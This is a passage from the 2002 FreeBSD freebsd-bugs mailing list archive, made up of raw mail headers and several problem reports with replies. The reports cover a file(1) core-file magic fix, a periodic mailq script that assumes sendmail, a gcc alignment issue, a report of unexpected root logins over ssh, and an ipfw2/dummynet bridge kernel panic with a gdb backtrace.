Subject: Re: kern/24559: aio_suspend() had Bus error when using -lc_r Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: aio_suspend() had Bus error when using -lc_r State-Changed-From-To: open->closed State-Changed-By: mp State-Changed-When: Sun Jul 28 11:12:24 PDT 2002 State-Changed-Why: Feedback timeout. http://www.freebsd.org/cgi/query-pr.cgi?pr=24559 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 19:50: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5677B37B400 for ; Sun, 28 Jul 2002 19:50:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 115E043E67 for ; Sun, 28 Jul 2002 19:50:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6T2o3JU044296 for ; Sun, 28 Jul 2002 19:50:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6T2o3MK044295; Sun, 28 Jul 2002 19:50:03 -0700 (PDT) Date: Sun, 28 Jul 2002 19:50:03 -0700 (PDT) Message-Id: <200207290250.g6T2o3MK044295@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Si-Liang Chang" Subject: Re: kern/40714: Functions with more than 1 arguments Gets More Executing Time. Reply-To: "Si-Liang Chang" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/40714; it has been noted by GNATS. From: "Si-Liang Chang" To: , Cc: Subject: Re: kern/40714: Functions with more than 1 arguments Gets More Executing Time. Date: Mon, 29 Jul 2002 10:43:52 +0800 This is a multi-part message in MIME format. ------=_NextPart_000_0008_01C236EC.D4B2E1F0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: quoted-printable Yes, I have install gcc 3.0.4. After compiling with -malign-double, it = seems that it doesn't work on my molecular dynamics programs. Si-Liang Chang ------=_NextPart_000_0008_01C236EC.D4B2E1F0 Content-Type: text/html; charset="big5" Content-Transfer-Encoding: quoted-printable
Yes, I have install gcc 3.0.4. After = compiling with=20 -malign-double, it seems that it doesn't work on my molecular dynamics=20 programs.
 
    Si-Liang = Chang
------=_NextPart_000_0008_01C236EC.D4B2E1F0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 0:20:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 204D337B401 for ; Mon, 29 Jul 2002 00:20:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26ABC43E6E for ; Mon, 29 Jul 2002 00:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6T7K2JU088911 for ; Mon, 29 Jul 2002 00:20:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6T7K2Ps088910; Mon, 29 Jul 2002 00:20:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 382A237B400 for ; Mon, 29 Jul 2002 00:14:02 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id D4D3243E31 for ; Mon, 29 Jul 2002 00:14:01 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6T7E0OT002729 for ; Mon, 29 Jul 2002 00:14:00 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6T7E0Uc002727; Mon, 29 Jul 2002 00:14:00 -0700 (PDT) Message-Id: <200207290714.g6T7E0Uc002727@www.freebsd.org> Date: Mon, 29 Jul 2002 00:14:00 -0700 (PDT) From: Miguel Angel Vicente Serrano To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41107: file(1) command shows incorrect data (signal #) when working with core files Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41107 >Category: misc >Synopsis: file(1) command shows incorrect data (signal #) when working with core files >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 00:20:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Miguel Angel Vicente Serrano >Release: 4.5 RELEASE >Organization: CICSA (Spain) >Environment: FreeBSD personal.sistemas.com 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 >Description: when we run "file corefile" we get an incorrect information about signal number which caused the core (always shows the number 4477762). /usr/share/misc/magic file has information about the offset of the signal and the name of the program in the core file. Perhaps these offsets are wrong in the case of FreeBSD's core files, but are good for Linux's cores. >How-To-Repeat: we can create some core files, for instance: sleep 300 & kill -3 $! we have sleep.core file (the signal can be 3, 4, 5, 6, 7, 8, 10, 11 or 12) we run "file sleep.core" and get this: sleep.core: ELF 32-bit LSB core file (signal 4477762), Intel 80386, version 1 (FreeBSD), from 'sleep' as you can see the signal number is wrong (must be 3, the one used with kill) >Fix: we create a temporal copy of "magic" file in /tmp directory: cd /tmp cp /usr/share/misc/magic . we work with this temporal copy of "magic" file we must change two lines, so the offsets of the signal and the program are right replace the line #6752 >Release-Note: >Audit-Trail: >Unformatted: >>>(0x38+0xcc) string >\0 of '%s' with this one >>>(0x38+0x15c) string >\0 of '%s' replace the line #6753 >>>(0x38+0x10) lelong >0 (signal %d), with this one >>>(0x38+0x28) lelong >0 (signal %d), we write a magic.mgc file: file -C -m magic we install the new pre-parsed version of magic file: mv /usr/share/misc/magic.mgc /usr/share/misc/magic.mgc.old mv magic.mgc /usr/share/misc we run "file sleep.core" and get this: sleep.core: ELF 32-bit LSB core file of 'sleep' (signal 3), Intel 80386, version 1 (FreeBSD), from 'sleep' as you can see the signal number is right (the one used with kill) and the name of the program is shown (LSB core file of 'sleep') To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 0:40:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BB70137B400 for ; Mon, 29 Jul 2002 00:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2A58F43E31 for ; Mon, 29 Jul 2002 00:40:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6T7e3JU091007 for ; Mon, 29 Jul 2002 00:40:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6T7e31g091006; Mon, 29 Jul 2002 00:40:03 -0700 (PDT) Date: Mon, 29 Jul 2002 00:40:03 -0700 (PDT) Message-Id: <200207290740.g6T7e31g091006@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41012; it has been noted by GNATS. From: Peter Pentchev To: Matthias Buelow Cc: FreeBSD-gnats-submit@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail Date: Mon, 29 Jul 2002 10:29:48 +0300 On Fri, Jul 26, 2002 at 06:52:37PM +0200, Matthias Buelow wrote: > > >Number: 41012 > >Category: bin > >Synopsis: /etc/periodic/daily/440.status-mailq assumes sendmail > >Originator: Matthias Buelow > >Release: FreeBSD 4.6-STABLE i386 > >Organization: > >Environment: > System: FreeBSD reiher.informatik.uni-wuerzburg.de 4.6-STABLE FreeBSD 4.6-STABLE #0: Sun Jul 7 02:24:38 CEST 2002 mkb@reiher.informatik.uni-wuerzburg.de:/usr/src/sys/compile/REIHER i386 > > >Description: > > The 440.status-mailq daily periodic script seems to assume sendmail > is being used as the mta. > I've got postfix running (from ports) and /usr/bin/mailq is routed > via mailer.conf to the postfix "sendmail" binary, which doesn't > support the following (quoted from script): > > ... > rc=$(case "$daily_status_mailq_shorten" in > [Yy][Ee][Ss]) > mailq -Ac | > perl -ne 'print if /^\s+\S+@/' | [snip] > Make the system scripts not assume that sendmail is being used. I believe that it would not be feasible, if at all possible, for the system periodic scripts to support the correct syntax for various mailers' commands. An easy workaround would be for you to set 'daily_status_mailq_enable="NO"' in your /etc/periodic.conf file (it might not yet exist, you may have to create it), then copy the system script to a different location and either use it as a local daily script (as indicated by the daily_local variable in the periodic.conf file), or create a different local daily script which invokes that. You can find a list of all the variables used to control periodic(8)'s behavior in the /etc/defaults/periodic.conf file; just as with /etc/defaults/rc.conf, you are *not* supposed to modify that file directly, rather redefine all variables that you wish to override in the /etc/periodic.conf file. G'luck, Peter -- Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This sentence claims to be an Epimenides paradox, but it is lying. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 2:49: 0 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E879B37B400; Mon, 29 Jul 2002 02:48:58 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9A21143E67; Mon, 29 Jul 2002 02:48:58 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6T9mwJU012731; Mon, 29 Jul 2002 02:48:58 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6T9mgdn012716; Mon, 29 Jul 2002 02:48:42 -0700 (PDT) Date: Mon, 29 Jul 2002 02:48:42 -0700 (PDT) From: David Malone Message-Id: <200207290948.g6T9mgdn012716@freefall.freebsd.org> To: slchang@csie.nctu.edu.tw, dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/40714: Functions with more than 1 arguments Gets More Executing Time. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Functions with more than 1 arguments Gets More Executing Time. State-Changed-From-To: feedback->closed State-Changed-By: dwmalone State-Changed-When: Mon Jul 29 02:47:54 PDT 2002 State-Changed-Why: Stack alignment problem fixed with gcc 3 port. http://www.freebsd.org/cgi/query-pr.cgi?pr=40714 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 3: 0:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 790A737B401 for ; Mon, 29 Jul 2002 03:00:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id EE3E443E5E for ; Mon, 29 Jul 2002 03:00:11 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TA0BJU013633 for ; Mon, 29 Jul 2002 03:00:11 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TA0BlK013632; Mon, 29 Jul 2002 03:00:11 -0700 (PDT) Date: Mon, 29 Jul 2002 03:00:11 -0700 (PDT) Message-Id: <200207291000.g6TA0BlK013632@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Malone Subject: Re: i386/40965: Random root access to non-root users from remote ssh shell Reply-To: David Malone Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/40965; it has been noted by GNATS. From: David Malone To: Marcos Galindo Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: i386/40965: Random root access to non-root users from remote ssh shell Date: Mon, 29 Jul 2002 10:56:08 +0100 On Wed, Jul 24, 2002 at 08:18:39PM -0700, Marcos Galindo wrote: > System runs an API on Postgresql 7.2 to control a small business. > Users login remotely from freebsd, linux and windows machines via > ssh. Remote root login is not allowed. Randomly, however, current > users, using their usual login names and passwords, find they have > logged-in as root. Are they actually logged in as root or is it just that their prompt is getting set to something ending with a "#"? Can you send the output of the "id" command for a user who finds themselves in this situation? David. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 4: 0:20 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8673D37B400 for ; Mon, 29 Jul 2002 04:00:10 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A5BB643E72 for ; Mon, 29 Jul 2002 04:00:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TB08JU024450 for ; Mon, 29 Jul 2002 04:00:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TB08dY024443; Mon, 29 Jul 2002 04:00:08 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 36F0837B400 for ; Mon, 29 Jul 2002 03:52:05 -0700 (PDT) Received: from room101.wuppy.net.ru (room101.WUPPY.NET.RU [212.30.189.131]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8764543E65 for ; Mon, 29 Jul 2002 03:51:49 -0700 (PDT) (envelope-from romanp@room101.wuppy.net.ru) Received: from room101.wuppy.net.ru (localhost [127.0.0.1]) by room101.wuppy.net.ru (8.12.5/8.12.5) with ESMTP id g6TApejI092993 for ; Mon, 29 Jul 2002 14:51:40 +0400 (MSD) (envelope-from romanp@room101.wuppy.net.ru) Received: (from romanp@localhost) by room101.wuppy.net.ru (8.12.5/8.12.5/Submit) id g6TApcIq092992; Mon, 29 Jul 2002 14:51:38 +0400 (MSD) Message-Id: <200207291051.g6TApcIq092992@room101.wuppy.net.ru> Date: Mon, 29 Jul 2002 14:51:38 +0400 (MSD) From: romanp@unshadow.net Reply-To: romanp@unshadow.net To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41114: ipfw2 + dummynet + bridge = kernel panic Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41114 >Category: kern >Synopsis: ipfw2 + dummynet + bridge = kernel panic >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 04:00:07 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Roman V. Palagin >Release: FreeBSD 4.6-20020725-STABLE i386 >Organization: >Environment: FreeBSD shaper.wuppy.net.ru 4.6-20020725-STABLE FreeBSD 4.6-20020725-STABLE #0: Mon Jul 29 09:39:05 MSD 2002 romanp@builder.unshadow.net:/opt/sys/compile/SHAPER.ipfw2 i386 >Description: Kernel panic occurs when packet from bridge code passed to dummynet. Backtrace: Script started on Mon Jul 29 10:31:20 2002 builder# gdb -k -c vmcore -se kernel GNU gdb 4.18 (FreeBSD) Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... IdlePTD at phsyical address 0x00327000 initial pcb at physical address 0x00291860 panicstr: page fault panic messages: --- Fatal trap 18: integer divide fault while in kernel mode instruction pointer = 0x8:0xc023cd16 stack pointer = 0x10:0xc0272cd4 frame pointer = 0x10:0xc0272d40 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = Idle interrupt mask = net trap number = 18 panic: integer divide fault syncing disks... Fatal trap 12: page fault while in kernel mode fault virtual address = 0x30 fault code = supervisor read, page not present instruction pointer = 0x8:0xc01eef14 stack pointer = 0x10:0xc0272b1c frame pointer = 0x10:0xc0272b24 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = Idle interrupt mask = net bio cam trap number = 12 panic: page fault Uptime: 4m44s dumping to dev #ad/0x20001, offset 65536 dump ata0: resetting devices .. done 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 --- #0 dumpsys () at ../../kern/kern_shutdown.c:487 487 if (dumping++) { (kgdb) bt #0 dumpsys () at ../../kern/kern_shutdown.c:487 #1 0xc014ecfb in boot (howto=260) at ../../kern/kern_shutdown.c:316 #2 0xc014f120 in poweroff_wait (junk=0xc026c3ec, howto=-1071202545) at ../../kern/kern_shutdown.c:595 #3 0xc023024e in trap_fatal (frame=0xc0272adc, eva=48) at ../../i386/i386/trap.c:974 #4 0xc022ff21 in trap_pfault (frame=0xc0272adc, usermode=0, eva=48) at ../../i386/i386/trap.c:867 #5 0xc022fadf in trap (frame={tf_fs = 16, tf_es = 16, tf_ds = 16, tf_edi = -1070945760, tf_esi = 0, tf_ebp = -1071174876, tf_isp = -1071174904, tf_ebx = -1071094756, tf_edx = 6864896, tf_ecx = 2, tf_eax = 0, tf_trapno = 12, tf_err = 0, tf_eip = -1071714540, tf_cs = 8, tf_eflags = 66054, tf_esp = 0, tf_ss = 0}) at ../../i386/i386/trap.c:466 #6 0xc01eef14 in acquire_lock (lk=0xc028641c) at ../../ufs/ffs/ffs_softdep.c:266 #7 0xc01f3536 in softdep_fsync_mountdev (vp=0xc5881cc0) at ../../ufs/ffs/ffs_softdep.c:4024 #8 0xc01f7766 in ffs_fsync (ap=0xc0272b98) at ../../ufs/ffs/ffs_vnops.c:134 #9 0xc01f63f7 in ffs_sync (mp=0xc1d22600, waitfor=2, cred=0xc04f4580, p=0xc02aaa20) at vnode_if.h:558 #10 0xc017e463 in sync (p=0xc02aaa20, uap=0x0) at ../../kern/vfs_syscalls.c:576 #11 0xc014ea96 in boot (howto=256) at ../../kern/kern_shutdown.c:235 #12 0xc014f120 in poweroff_wait (junk=0xc026c3ec, howto=-1071202582) at ../../kern/kern_shutdown.c:595 #13 0xc023024e in trap_fatal (frame=0xc0272c94, eva=0) at ../../i386/i386/trap.c:974 #14 0xc022fc2b in trap (frame={tf_fs = 16, tf_es = 16, tf_ds = 16, tf_edi = -1042360200, tf_esi = 0, tf_ebp = -1071174336, tf_isp = -1071174464, tf_ebx = 6422528, tf_edx = 0, tf_ecx = 0, tf_eax = 1, tf_trapno = 18, tf_err = 0, tf_eip = -1071395562, tf_cs = 8, tf_eflags = 66118, tf_esp = 0, tf_ss = -1042685952}) at ../../i386/i386/trap.c:636 #15 0xc023cd16 in __qdivrem (uq=6422528, vq=0, arq=0x0) at ../../libkern/qdivrem.c:100 #16 0xc023d0f6 in __udivdi3 (a=6422528, b=0) at ../../libkern/udivdi3.c:50 #17 0xc019bb33 in dummynet_io (m=0xc050aa00, pipe_nr=2, dir=3, fwa=0xc0272e04) at ../../netinet/ip_dummynet.c:1205 ---Type to continue, or q to quit--- #18 0xc0187a9d in bdg_forward (m0=0xc050aa00, eh=0xc050d802, dst=0x5) at ../../net/bridge.c:972 #19 0xc018a455 in ether_input (ifp=0xc1d02000, eh=0xc050d802, m=0xc050aa00) at ../../net/if_ethersubr.c:589 #20 0xc01e3c2a in xl_rxeof (sc=0xc1d02000) at ../../pci/if_xl.c:1855 #21 0xc01e42bc in xl_intr (arg=0xc1d02000) at ../../pci/if_xl.c:2061 #22 0xc0229a4e in cpu_idle () at ../../i386/i386/machdep.c:1024 (kgdb) fr 18 #18 0xc0187a9d in bdg_forward (m0=0xc050aa00, eh=0xc050d802, dst=0x5) at ../../net/bridge.c:972 972 ip_dn_io_ptr(m, (i & 0xffff),DN_TO_BDG_FWD, &args); (kgdb) list 967 return m0 ; 968 bcopy(&save_eh, mtod(m, struct ether_header *), ETHER_HDR_LEN); 969 } 970 971 args.oif = real_dst; 972 ip_dn_io_ptr(m, (i & 0xffff),DN_TO_BDG_FWD, &args); 973 return m0 ; 974 } 975 /* 976 * XXX at some point, add support for divert/forward actions. (kgdb) fr 17 #17 0xc019bb33 in dummynet_io (m=0xc050aa00, pipe_nr=2, dir=3, fwa=0xc0272e04) at ../../netinet/ip_dummynet.c:1205 1205 q->F = q->S + ( len<weight; (kgdb) list 1200 pipe->sum += fs->weight ; /* add weight of new queue */ 1201 } else { 1202 heap_extract(&(pipe->idle_heap), q); 1203 q->S = MAX64(q->F, pipe->V ) ; 1204 } 1205 q->F = q->S + ( len<weight; 1206 1207 if (pipe->not_eligible_heap.elements == 0 && 1208 pipe->scheduler_heap.elements == 0) 1209 pipe->V = MAX64 ( q->S, pipe->V ); (kgdb) p fs->weight $1 = 0 (kgdb) p fwa $2 = (struct ip_fw_args *) 0xc0272e04 (kgdb) p *fwa $3 = {m = 0xc050aa00, oif = 0x5, next_hop = 0x0, rule = 0xc1d96080, eh = 0xc0272df4, ro = 0xc050d802, dst = 0xc1d53970, flags = -1072138838, f_id = { dst_ip = 3232236010, src_ip = 3232236020, dst_port = 0, src_port = 0, proto = 1 '\001', flags = 8 '\b'}, divert_rule = 0, retval = 3251642368} (kgdb) p/x *fwa $4 = {m = 0xc050aa00, oif = 0x5, next_hop = 0x0, rule = 0xc1d96080, eh = 0xc0272df4, ro = 0xc050d802, dst = 0xc1d53970, flags = 0xc01875aa, f_id = { dst_ip = 0xc0a801ea, src_ip = 0xc0a801f4, dst_port = 0x0, src_port = 0x0, proto = 0x1, flags = 0x8}, divert_rule = 0x0, retval = 0xc1d02000} (kgdb) p/x *fwa->rule $5 = {next = {le_next = 0xc1d99540, le_prev = 0x0}, fw_flg = 0x60004, fw_pcnt = 0x100000064, fw_bcnt = 0x5400000000, fw_src = {s_addr = 0x0}, fw_dst = { s_addr = 0x3d44dfaf}, fw_smsk = {s_addr = 0x201}, fw_dmsk = { s_addr = 0xf401a8c0}, fw_number = 0x205, fw_prot = 0x0, fw_nports = 0x0, fw_uar = {fw_pts = {0xa8c0, 0xea01, 0x231, 0x2, 0x0, 0x0, 0xb2, 0x0, 0x0, 0x0}, fw_icmptypes = {0xea01a8c0, 0x20231, 0x0, 0xb2}}, fw_ipflg = 0xc1d08168, fw_iplen = 0x6100, fw_ipid = 0xc1d9, fw_ipopt = 0x48, fw_ipnopt = 0xa0, fw_iptos = 0xd3, fw_ipntos = 0xc1, fw_ipttl = 0x40, fw_ipver = 0x0, fw_tcpopt = 0xd9, fw_tcpnopt = 0xc1, fw_tcpf = 0x10, fw_tcpnf = 0x61, fw_tcpwin = 0xc1d9, fw_tcpseq = 0xc587f2c0, fw_tcpack = 0x0, timestamp = 0x642e0800, fw_in_if = {fu_via_ip = {s_addr = 0x696f6365}, fu_via_if = {name = {0x65, 0x63, 0x6f, 0x69, 0x6e, 0x69, 0x0, 0x0, 0x0, 0x0}, unit = 0x0}}, fw_out_if = {fu_via_ip = {s_addr = 0x0}, fu_via_if = {name = { 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x80, 0xea}, unit = 0xc1cf}}, fw_un = {fu_divert_port = 0xc2, fu_pipe_nr = 0xc2, fu_skipto_rule = 0xc2, fu_reject_code = 0xc2, fu_fwd_ip = {sin_len = 0xc2, sin_family = 0x0, sin_port = 0x0, sin_addr = {s_addr = 0x0}, sin_zero = {0xec, 0x86, 0xd0, 0xc1, 0xc0, 0xa9, 0xd8, 0xc1}}}, pipe_ptr = 0xc1ded878, next_rule_ptr = 0xc1d960c0, fw_uid = 0xc1d8a9d0, fw_gid = 0xc587f2c0, fw_logamount = 0x0, fw_loghighest = 0x636d7265742e0800, dont_match_prob = 0x7061, dyn_type = 0x0, limit_mask = 0x0, conn_limit = 0x0} (kgdb) p/x fwa->rule->fw_flg $6 = 0x60004 (kgdb) quit Script done on Mon Jul 29 10:42:10 2002 ipfw sh: 00100 0 0 pipe 2 ip from 192.168.1.244 to 192.168.1.234 00200 0 0 pipe 1 ip from 192.168.1.234 to 192.168.1.244 65535 21 2783 allow ip from any to any ipfw pipe sh: 00001: 256.000 Kbit/s 0 ms 50 sl. 0 queues (1 buckets) droptail mask: 0x00 0x00000000/0x0000 -> 0x00000000/0x0000 00002: 256.000 Kbit/s 0 ms 50 sl. 0 queues (1 buckets) droptail mask: 0x00 0x00000000/0x0000 -> 0x00000000/0x0000 192.168.1.234 and 192.168.1.244 besides on different interfaces of bridge machine. Bridge itself doesn't have IP address at all. >How-To-Repeat: Enable IPFW2, bridge, configure pipes for machines from different ethernet interfaces, ping one from another - oops :) >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 4:20:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0A9D837B400 for ; Mon, 29 Jul 2002 04:20:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5BB5343E42 for ; Mon, 29 Jul 2002 04:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TBK3JU034417 for ; Mon, 29 Jul 2002 04:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TBK30A034416; Mon, 29 Jul 2002 04:20:03 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DAF9837B400 for ; Mon, 29 Jul 2002 04:14:15 -0700 (PDT) Received: from gx.dnepr.net (gx.dnepr.net [217.198.131.109]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1743443E3B for ; Mon, 29 Jul 2002 04:14:14 -0700 (PDT) (envelope-from land@gx.dnepr.net) Received: from gx.dnepr.net (localhost.dnepr.net [127.0.0.1]) by gx.dnepr.net with ESMTP id g6TBE5nA000633 for ; Mon, 29 Jul 2002 14:14:05 +0300 (EEST) (envelope-from land@gx.dnepr.net) Received: (from land@localhost) by gx.dnepr.net id g6TBE3Ka000632; Mon, 29 Jul 2002 14:14:03 +0300 (EEST) (envelope-from land) Message-Id: <200207291114.g6TBE3Ka000632@gx.dnepr.net> Date: Mon, 29 Jul 2002 14:14:03 +0300 